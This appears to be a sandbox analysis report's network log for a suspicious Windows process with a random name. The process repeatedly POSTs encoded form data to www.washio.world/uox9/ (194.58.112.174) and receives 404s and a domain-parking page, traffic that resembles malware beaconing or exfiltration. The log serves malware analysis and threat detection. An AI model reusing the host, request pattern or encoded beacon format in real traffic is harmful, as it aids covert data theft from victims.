                                                  29192.168.2.449766194.58.112.174801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:12.284603119 CEST768OUTPOST /uox9/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.washio.world
                                                  Origin: http://www.washio.world
                                                  Referer: http://www.washio.world/uox9/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 66 6d 43 4b 52 63 67 4b 57 4a 59 6b 49 4e 75 4b 70 51 49 5a 52 6a 4e 4f 73 43 58 52 4b 56 77 6f 38 71 39 56 4e 2b 79 47 62 46 53 4b 55 34 6f 38 42 6f 79 77 56 6f 48 4d 38 2f 6c 46 6a 6a 47 2b 74 70 42 7a 74 70 61 73 37 4c 42 49 6a 41 76 58 63 49 32 77 71 4b 4a 45 6a 50 4a 4a 42 72 70 47 59 67 51 63 75 6a 36 46 6c 58 42 50 42 72 65 74 46 33 52 55 6a 75 2f 4f 50 4b 48 76 4e 4a 75 56 42 38 62 61 52 32 51 4f 6a 75 57 66 49 53 59 6a 50 63 30 6f 50 45 51 33 7a 76 6c 76 57 38 70 4b 78 71 43 6f 35 63 79 6a 62 65 34 6c 31 4a 68 64 72 64 55 75 4a 51 54 4c 50 41 79 57 72 55 71 56 75 77 3d 3d
                                                  Data Ascii: wd98XJp=fmCKRcgKWJYkINuKpQIZRjNOsCXRKVwo8q9VN+yGbFSKU4o8BoywVoHM8/lFjjG+tpBztpas7LBIjAvXcI2wqKJEjPJJBrpGYgQcuj6FlXBPBretF3RUju/OPKHvNJuVB8baR2QOjuWfISYjPc0oPEQ3zvlvW8pKxqCo5cyjbe4l1JhdrdUuJQTLPAyWrUqVuw==
                                                  Jul 2, 2024 14:09:12.975966930 CEST1236INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 02 Jul 2024 12:09:12 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Content-Encoding: gzip
                                                  Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 [TRUNCATED]
                                                  Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskka-?p;uK]@R]qd$]$ze9|C?`Y| AUU68i]?s#[(v\eG4#*WX._nV:H:=T@z#\-?8dXF0@HfQ~f.0i$<l$;mc[EkH2SmN4pV+!J);G$R`x/~Em|'y|^%WDmPaEeLv]PE6<aF%uhgUVV C*x/6b0a$#ffOvZhc"SCig~7}v;A3'l,9%GQ{ak])[Xy6,TH3.mFN&jY1kY[=U~cb`jd#VrL?<x- 3g)XVG lTGqe4^"+NkPiao#g\p~Pzs:op,**P)LEdRSsUq{''b)xeM+nw|*R [TRUNCATED]
                                                  Jul 2, 2024 14:09:12.975986958 CEST224INData Raw: 7d 4f db a7 b3 4e cc 5f 20 55 d7 18 c0 8f 1d af e5 aa 8d c8 d0 3e 8d 09 a3 c0 f7 ba 4f 37 0a 18 18 70 b7 29 80 fd 0b e8 45 b4 82 7a 1f c7 f7 80 33 1e 61 8a 5f 67 1d 57 2b 27 1c b5 b5 c9 73 49 da 3e 98 6e 80 f8 e8 29 8c fb 67 44 bd fb c9 97 70 91
                                                  Data Ascii: }ON_ U>O7p)Ez3a_gW+'sI>n)gDpw"':<Rqqxh5S5l(2ie;adw-huZ4Ll;G|IC;:OZ`z5HPf,x<-
                                                  Jul 2, 2024 14:09:12.975997925 CEST1236INData Raw: 3f c9 87 58 d1 4e fc 00 b2 ed 62 21 58 44 72 5b 50 52 93 16 20 cd 61 c7 4c 2b 28 6a d2 82 77 f0 ff 01 ad 31 0b a7 d0 40 f2 09 6b 81 7d 19 5a 8a bf 83 5a d0 f6 87 5f ef bf 31 37 59 83 c1 78 d0 6a ff 94 7c 9e 9a f5 1e 5b 33 5d 26 93 d0 4e fc 08 79
                                                  Data Ascii: ?XNb!XDr[PR aL+(jw1@k}ZZ_17Yxj|[3]&Ny6`,f1[gU[#]:`.KMgL:fD0@n<WUU/$@XO_aj;%t.0b`:P7z?Oz?jcS
                                                  Jul 2, 2024 14:09:12.976015091 CEST1121INData Raw: 2e 0a aa 62 ba 11 b5 0f 14 ce dd bc 95 a9 ce d7 8f 4c 7d 9d 8c 85 6b 8b 96 d3 99 3b ce a6 0c 04 9d f7 87 b8 42 c5 25 f6 68 80 0b 25 f3 77 23 15 8c d7 94 0b da f7 83 73 ae 5b 11 65 59 16 d5 e9 d9 48 8a 0d 3f 80 bc 34 86 83 fe 27 56 f0 af ae 87 33
                                                  Data Ascii: .bL}k;B%h%w#s[eYH?4'V3]uJ'?fyutlEIwZWWUs3B~uPQ.UXsG_]412p:8/,:KvS[nP.Q9.tf'|u|IvJ'.O$G


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  30192.168.2.449767194.58.112.174801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:14.813560009 CEST788OUTPOST /uox9/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.washio.world
                                                  Origin: http://www.washio.world
                                                  Referer: http://www.washio.world/uox9/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 66 6d 43 4b 52 63 67 4b 57 4a 59 6b 4a 74 2b 4b 6c 58 38 5a 54 44 4e 4e 6a 69 58 52 54 46 77 73 38 71 68 56 4e 2f 33 62 4f 6e 6d 4b 55 5a 59 38 54 39 53 77 53 6f 48 4d 30 66 6c 36 74 44 47 31 74 70 63 45 74 72 65 73 37 4c 56 49 6a 46 4c 58 63 2f 43 2f 72 61 4a 43 73 76 4a 50 63 62 70 47 59 67 51 63 75 6e 61 38 6c 57 70 50 43 62 75 74 45 54 39 54 38 65 2f 52 59 36 48 76 47 70 75 5a 42 38 62 34 52 30 30 6f 6a 73 65 66 49 54 49 6a 50 4e 30 72 56 55 51 78 74 66 6b 4f 52 64 77 45 34 36 72 6b 77 73 61 41 59 39 45 6d 35 76 77 48 36 73 31 35 62 51 33 34 53 48 37 69 6d 58 58 63 31 36 77 55 43 61 68 52 68 4b 48 72 72 51 6a 71 49 74 52 65 62 2b 55 3d
                                                  Data Ascii: wd98XJp=fmCKRcgKWJYkJt+KlX8ZTDNNjiXRTFws8qhVN/3bOnmKUZY8T9SwSoHM0fl6tDG1tpcEtres7LVIjFLXc/C/raJCsvJPcbpGYgQcuna8lWpPCbutET9T8e/RY6HvGpuZB8b4R00ojsefITIjPN0rVUQxtfkORdwE46rkwsaAY9Em5vwH6s15bQ34SH7imXXc16wUCahRhKHrrQjqItReb+U=
                                                  Jul 2, 2024 14:09:15.533071041 CEST1236INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 02 Jul 2024 12:09:15 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Content-Encoding: gzip
                                                  Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 [TRUNCATED]
                                                  Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskka-?p;uK]@R]qd$]$ze9|C?`Y| AUU68i]?s#[(v\eG4#*WX._nV:H:=T@z#\-?8dXF0@HfQ~f.0i$<l$;mc[EkH2SmN4pV+!J);G$R`x/~Em|'y|^%WDmPaEeLv]PE6<aF%uhgUVV C*x/6b0a$#ffOvZhc"SCig~7}v;A3'l,9%GQ{ak])[Xy6,TH3.mFN&jY1kY[=U~cb`jd#VrL?<x- 3g)XVG lTGqe4^"+NkPiao#g\p~Pzs:op,**P)LEdRSsUq{''b)xeM+nw|*R [TRUNCATED]
                                                  Jul 2, 2024 14:09:15.533170938 CEST1236INData Raw: 7d 4f db a7 b3 4e cc 5f 20 55 d7 18 c0 8f 1d af e5 aa 8d c8 d0 3e 8d 09 a3 c0 f7 ba 4f 37 0a 18 18 70 b7 29 80 fd 0b e8 45 b4 82 7a 1f c7 f7 80 33 1e 61 8a 5f 67 1d 57 2b 27 1c b5 b5 c9 73 49 da 3e 98 6e 80 f8 e8 29 8c fb 67 44 bd fb c9 97 70 91
                                                  Data Ascii: }ON_ U>O7p)Ez3a_gW+'sI>n)gDpw"':<Rqqxh5S5l(2ie;adw-huZ4Ll;G|IC;:OZ`z5HPf,x<-?XNb!XDr[PR
                                                  Jul 2, 2024 14:09:15.533178091 CEST1236INData Raw: e9 fe 93 08 93 79 0e 74 a5 23 b0 c8 53 d0 14 5c 9c 70 2f 86 62 b6 fb e6 d4 15 84 47 01 9d 52 80 62 f2 8a 64 99 13 02 ce 86 0b 87 12 68 8e 54 18 3c fe 08 dc f9 29 07 7a ec 66 19 e6 90 e7 a8 88 bf e1 6e 80 b3 ce 32 40 db 35 ec 90 f3 2d 34 a5 0e f8
                                                  Data Ascii: yt#S\p/bGRbdhT<)zfn2@5-4yr>L)'AO,+N;)CgXAH1{b7Nd1D*=N=S/C!/v,\?-(!xGFBW!*Mw.bL}
                                                  Jul 2, 2024 14:09:15.533190966 CEST109INData Raw: 64 ab 42 2d 8e 15 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 e1 8b f3 67 67 d0 d5 af d2 e6 ae 64 8b 42 98 95 c9 8b f7 6b 74 74 8d 07 7d 3e 1c 0b 2f 75 ce ca 76 e8 bb a3 48 ad 08 ba 00 39 6b 9c c1 cf f0 ca 4a 49 48 17 4f 9c c8 11 74 92 3e 99 94 30 66
                                                  Data Ascii: dB-6^4gggdBktt}>/uvH9kJIHOt>0f2kPn=)0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  31192.168.2.449768194.58.112.174801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:17.374269962 CEST10870OUTPOST /uox9/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.washio.world
                                                  Origin: http://www.washio.world
                                                  Referer: http://www.washio.world/uox9/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 66 6d 43 4b 52 63 67 4b 57 4a 59 6b 4a 74 2b 4b 6c 58 38 5a 54 44 4e 4e 6a 69 58 52 54 46 77 73 38 71 68 56 4e 2f 33 62 4f 6e 65 4b 55 72 51 38 42 4d 53 77 54 6f 48 4d 2b 2f 6c 37 74 44 47 53 74 70 55 41 74 72 44 52 37 4a 74 49 69 6a 48 58 4c 61 75 2f 69 61 4a 43 6e 50 4a 4b 42 72 6f 63 59 67 41 59 75 6a 2b 38 6c 57 70 50 43 5a 32 74 4e 6e 52 54 2b 65 2f 4f 50 4b 48 72 4e 4a 75 31 42 38 44 43 52 30 68 54 6a 63 2b 66 49 79 34 6a 4a 2f 73 72 65 55 51 7a 73 66 6b 73 52 64 4d 50 34 36 33 43 77 73 65 36 59 36 73 6d 76 4c 4e 4e 6c 64 63 6c 4b 44 72 42 4b 31 61 45 72 6c 48 4d 31 64 6c 6f 4e 36 38 4b 7a 5a 4c 31 70 78 65 56 66 66 39 75 4a 5a 42 6f 6b 59 64 56 5a 59 44 6c 68 59 32 78 4e 52 4f 73 4f 39 2b 35 73 4a 52 68 55 52 52 5a 2f 51 49 36 4d 4e 58 4c 35 4a 56 30 61 6f 58 61 6d 47 6d 37 50 64 4c 43 4e 37 4b 45 63 4f 66 4e 50 63 53 70 73 62 33 2b 48 6e 77 48 68 64 51 35 37 31 63 32 76 62 41 76 59 49 6b 6b 4b 51 64 36 63 61 61 4a 41 43 51 35 74 49 63 70 62 61 6b 52 53 7a 31 2b 58 67 [TRUNCATED]
                                                  Data Ascii: wd98XJp=fmCKRcgKWJYkJt+KlX8ZTDNNjiXRTFws8qhVN/3bOneKUrQ8BMSwToHM+/l7tDGStpUAtrDR7JtIijHXLau/iaJCnPJKBrocYgAYuj+8lWpPCZ2tNnRT+e/OPKHrNJu1B8DCR0hTjc+fIy4jJ/sreUQzsfksRdMP463Cwse6Y6smvLNNldclKDrBK1aErlHM1dloN68KzZL1pxeVff9uJZBokYdVZYDlhY2xNROsO9+5sJRhURRZ/QI6MNXL5JV0aoXamGm7PdLCN7KEcOfNPcSpsb3+HnwHhdQ571c2vbAvYIkkKQd6caaJACQ5tIcpbakRSz1+XgqBp5z3j7Xk7L8Og43oynn5nWRk1lc6ZRrSbnzbadlsS+vNjVHXnzcp8WKKJ6iT53NTI199ZqiAdlw1aEy7adsAPY3vz+xMKzinQR6wkUr87F2wE2NkvUamDkKT1oFYvBbnCtV9D6CW/NTU1zuWUbkYzsuL4qIKl+0kj/SmyRneqtbYBWzys9GPfg1fyl4TjxoFP/6H5Sd5Mz0+eiDYMhu6GCbhs3LK3V4UxLOw1CwzTK3jY6ulzqdGX6lRL7SPfoyr9Jo/TwkJftOrOeKNrMdqQ3XTSjR859hKPeV4mnGrHNwLPkwkB1OFqF0CJbYsC3GzMvXtDNVT7AicCEG9j17ZM8z/XKfodyOJbC53xKkuKOytrhST0lD7fmeh1WGR7E+HOhEiQJFLX+JQU39pPpWTFPyXh/um71j73+kpjceCliZgz/Z5ss0if/gGPiSVIh0HovFV9fuIzQPGFuzqbxpTUcM5mjfWFDZN/H+fwGsYwQCt6a98qgFVLMjuT9mIKYicBCM9A75JQqfmALLrp3zaaDqY+V1p4y6qIe95ZJX+baeniXpnzwdG2nT/iMhT+Aamv690fTWqJSZn4qbuUoAIisUcAXHy5hwLzRjg/+ousfUCWZNDRVr5EtqGoOjyh2ezjoM7w95X3g5ZoZ9GcvkgmybyCmEC1typ [TRUNCATED]
                                                  Jul 2, 2024 14:09:18.080084085 CEST1236INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 02 Jul 2024 12:09:17 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Content-Encoding: gzip
                                                  Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 [TRUNCATED]
                                                  Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskka-?p;uK]@R]qd$]$ze9|C?`Y| AUU68i]?s#[(v\eG4#*WX._nV:H:=T@z#\-?8dXF0@HfQ~f.0i$<l$;mc[EkH2SmN4pV+!J);G$R`x/~Em|'y|^%WDmPaEeLv]PE6<aF%uhgUVV C*x/6b0a$#ffOvZhc"SCig~7}v;A3'l,9%GQ{ak])[Xy6,TH3.mFN&jY1kY[=U~cb`jd#VrL?<x- 3g)XVG lTGqe4^"+NkPiao#g\p~Pzs:op,**P)LEdRSsUq{''b)xeM+nw|*R [TRUNCATED]
                                                  Jul 2, 2024 14:09:18.080104113 CEST1236INData Raw: 7d 4f db a7 b3 4e cc 5f 20 55 d7 18 c0 8f 1d af e5 aa 8d c8 d0 3e 8d 09 a3 c0 f7 ba 4f 37 0a 18 18 70 b7 29 80 fd 0b e8 45 b4 82 7a 1f c7 f7 80 33 1e 61 8a 5f 67 1d 57 2b 27 1c b5 b5 c9 73 49 da 3e 98 6e 80 f8 e8 29 8c fb 67 44 bd fb c9 97 70 91
                                                  Data Ascii: }ON_ U>O7p)Ez3a_gW+'sI>n)gDpw"':<Rqqxh5S5l(2ie;adw-huZ4Ll;G|IC;:OZ`z5HPf,x<-?XNb!XDr[PR
                                                  Jul 2, 2024 14:09:18.080116987 CEST1236INData Raw: e9 fe 93 08 93 79 0e 74 a5 23 b0 c8 53 d0 14 5c 9c 70 2f 86 62 b6 fb e6 d4 15 84 47 01 9d 52 80 62 f2 8a 64 99 13 02 ce 86 0b 87 12 68 8e 54 18 3c fe 08 dc f9 29 07 7a ec 66 19 e6 90 e7 a8 88 bf e1 6e 80 b3 ce 32 40 db 35 ec 90 f3 2d 34 a5 0e f8
                                                  Data Ascii: yt#S\p/bGRbdhT<)zfn2@5-4yr>L)'AO,+N;)CgXAH1{b7Nd1D*=N=S/C!/v,\?-(!xGFBW!*Mw.bL}
                                                  Jul 2, 2024 14:09:18.080132008 CEST109INData Raw: 64 ab 42 2d 8e 15 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 e1 8b f3 67 67 d0 d5 af d2 e6 ae 64 8b 42 98 95 c9 8b f7 6b 74 74 8d 07 7d 3e 1c 0b 2f 75 ce ca 76 e8 bb a3 48 ad 08 ba 00 39 6b 9c c1 cf f0 ca 4a 49 48 17 4f 9c c8 11 74 92 3e 99 94 30 66
                                                  Data Ascii: dB-6^4gggdBktt}>/uvH9kJIHOt>0f2kPn=)0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  32192.168.2.449769194.58.112.174801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:19.910671949 CEST499OUTGET /uox9/?wd98XJp=SkqqSrQ8SMo2XL3atDg5EwteixjEHmcOkKNOXL2YXVO5YY42DfvwbKSww9pKtEGGvKt0lrGjy49L8DH+d/eZjL5PtpdyGoJABAcliTTSnjNRJ5qgIg1UjKg=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.washio.world
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:09:20.628379107 CEST1236INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 02 Jul 2024 12:09:20 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 77 61 73 68 69 6f 2e 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 [TRUNCATED]
                                                  Data Ascii: 293d<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.washio.world</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" [TRUNCATED]
                                                  Jul 2, 2024 14:09:20.628391027 CEST224INData Raw: 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e
                                                  Data Ascii: iv class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.washio.world</h1><p class="b-
                                                  Jul 2, 2024 14:09:20.628397942 CEST1236INData Raw: 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 62 72 3e d0
                                                  Data Ascii: parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_normal b-p
                                                  Jul 2, 2024 14:09:20.628413916 CEST1236INData Raw: 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74
                                                  Data Ascii: type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nbsp;</p></div><
                                                  Jul 2, 2024 14:09:20.628421068 CEST1236INData Raw: 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 77 61 73 68 69 6f 2e 77 6f 72 6c 64 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 68 6f 73 74
